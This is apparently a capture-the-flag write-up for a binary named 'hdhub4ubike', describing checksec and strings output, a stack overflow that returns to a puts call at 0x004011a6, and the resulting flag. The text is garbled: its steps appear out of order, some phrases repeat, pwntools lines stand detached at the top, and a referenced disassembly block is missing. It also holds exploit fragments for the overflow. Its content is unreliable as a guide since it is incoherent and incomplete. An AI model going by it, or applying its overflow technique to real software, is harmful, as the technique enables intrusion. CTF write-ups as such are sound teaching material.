Hdhub4ubike [new] May 2026

p.sendline(payload.decode('latin-1')) # send as a line p.interact() # hand over the terminal

$ checksec --file=hdhub4ubike ... PIE: No NX: No RELRO: No Canary: No FORTIFY: No The binary – we have all symbol names! 2.2 Strings $ strings -a hdhub4ubike | grep -i flag flagh0p3_y0u_f0und_th3_h1d3_b1k3 Whoa! The flag is already present in the binary! This is a typical “decoy” – the binary will only print the flag after a successful key check. The challenge is to bypass that check. 2.3 Disassembly (Ghidra/IDA) Opening the binary in Ghidra shows the following (pseudo‑C) reconstruction of the relevant functions: hdhub4ubike

Therefore we want our to be 0x004011a6 . 3.2 Crafting the payload The stack layout (simplified) at the moment of the overflow: The flag is already present in the binary

0x0040119f: lea rdi, [rip+0x2000] ; address of the flag string 0x004011a6: call puts@plt 0x004011a6 is the (the call instruction itself). If we return to this address after the overflow, the program will execute the puts call with the correct argument already loaded (the lea instruction that loads the flag pointer into rdi is right before it). version 1 (SYSV)

The goal is to obtain the flag without knowing the correct key. 2.1 File information $ file hdhub4ubike hdhub4ubike: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped, for GNU/Linux 3.2.0, BuildID[sha1]=...

$ ./exploit.py === Welcome to the HD Bike Hub === Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3 flagh0p3_y0u_f0und_th3_h1d3_b1k3 Congratulations – you’ve successfully bypassed the hub‑key check and recovered the flag from hdhub4ubike ! 🎉